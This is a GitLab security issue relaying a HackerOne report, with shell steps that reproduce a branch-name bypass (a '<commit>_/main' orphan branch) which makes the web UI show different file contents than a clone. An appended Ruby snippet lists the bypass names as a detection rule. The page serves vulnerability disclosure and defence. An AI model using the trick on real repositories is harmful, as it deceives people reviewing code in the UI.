Manipulate the repository content in the UI (bypass #2031845)

Please read the process on how to fix security issues before starting to work on the issue. Vulnerabilities must be fixed in a security mirror.

HackerOne report #2173053 by shells3c on 2023-09-20, assigned to GitLab Team:

Report

Summary

In order to fix #2031845, GitLab added another check in the `prohibited_branch_checks` method to prevent any branch name that matches `<hex>-/`. However, the `_` character also works and hasn't been protected yet.

Steps to reproduce

1. Create a new empty project on GitLab.
2. Clone the project and create a safe repository for UI display:

   ```shell
   mkdir -p ./_/main
   echo "safe" > ./_/main/script.sh
   git add -A
   git commit -m .
   git push origin
   ```

3. Create a malicious branch with the malicious code:

   ```shell
   git checkout --orphan "$(git rev-parse HEAD)_/main"
   git rm -rf .
   echo "evil" > script.sh
   git add -A
   git commit -m .
   git push origin
   ```

4. Go to your repository settings and set your default branch to the new branch.

Now visit the project on GitLab and view the content of `script.sh`: you will see `safe`, but if you clone it, the file will contain `evil`.

Output of checks

This bug happens on GitLab.com

Impact

Similar to #1864278 (you can read it here if you can't access the HackerOne report), the repository you see from the UI is different from the repository you clone. You can see the video in the original report to understand it better.
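As an added, defender-side illustration (not GitLab's code and not part of the report): the narrow check the Summary describes, matching only `<hex>-/`, placed beside a broader rule that rejects any branch name starting with a full-length commit id regardless of the separator that follows it. The method names, the broader rule and the sample branch list are assumptions constructed for this example; the page does not say what GitLab's eventual fix looked like.

```ruby
# Added illustration, not GitLab's own code: the kind of branch-name rule the
# report describes, shown beside a broader rule. Method names, constants and
# the sample branch list are constructed for this example.

# Narrow rule, as the report describes the existing prohibited_branch_checks
# addition: a run of hex digits, then "-/". A "_" separator slips past it.
NARROW_RULE = /\A\h+-\//

# Broader rule (an assumed safer policy, not GitLab's actual fix): reject any
# branch whose name begins with a full-length commit id, SHA-1 (40 hex) or
# SHA-256 (64 hex), whatever character follows it. The negative lookahead
# keeps longer hex runs (which cannot be a commit id) allowed.
BROAD_RULE = /\A(?:\h{64}|\h{40})(?!\h)/

def narrow_prohibited?(name)
  name.match?(NARROW_RULE)
end

def broad_prohibited?(name)
  name.match?(BROAD_RULE)
end

# Given a list of existing branch names (for example the output of
# `git for-each-ref --format='%(refname:short)' refs/heads`), return those the
# broad rule rejects but the narrow rule lets through. Useful when auditing a
# repository for branches created before a stricter check was in place.
def missed_by_narrow_rule(names)
  names.select { |n| broad_prohibited?(n) && !narrow_prohibited?(n) }
end

# Constructed sample commit id (not a real commit) and branch names.
SAMPLE_SHA = '0123456789abcdef0123456789abcdef01234567'
SAMPLE_BRANCHES = [
  'main',
  'feature/login-fix',
  "#{SAMPLE_SHA}-/main",   # blocked by the narrow rule
  "#{SAMPLE_SHA}_/main",   # the bypass described in the report
  "#{SAMPLE_SHA}/main",    # bare commit id as the first path segment
  "#{SAMPLE_SHA}a/main"    # 41 hex digits: not a commit id, allowed
].freeze

if __FILE__ == $PROGRAM_NAME
  SAMPLE_BRANCHES.each do |b|
    puts format('%-50s narrow=%-5s broad=%s', b, narrow_prohibited?(b), broad_prohibited?(b))
  end
  puts "Missed by narrow rule: #{missed_by_narrow_rule(SAMPLE_BRANCHES).inspect}"
end
```

Running the script lists each sample branch with the verdict of both rules; the two names that only the broader rule catches are the `_` variant from the report and a bare commit id used as the first path segment. The same `missed_by_narrow_rule` call can be pointed at a repository's real branch list to find refs that were created while only the narrow rule was enforced.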

How To Reproduce

Please add reproducibility information to this section: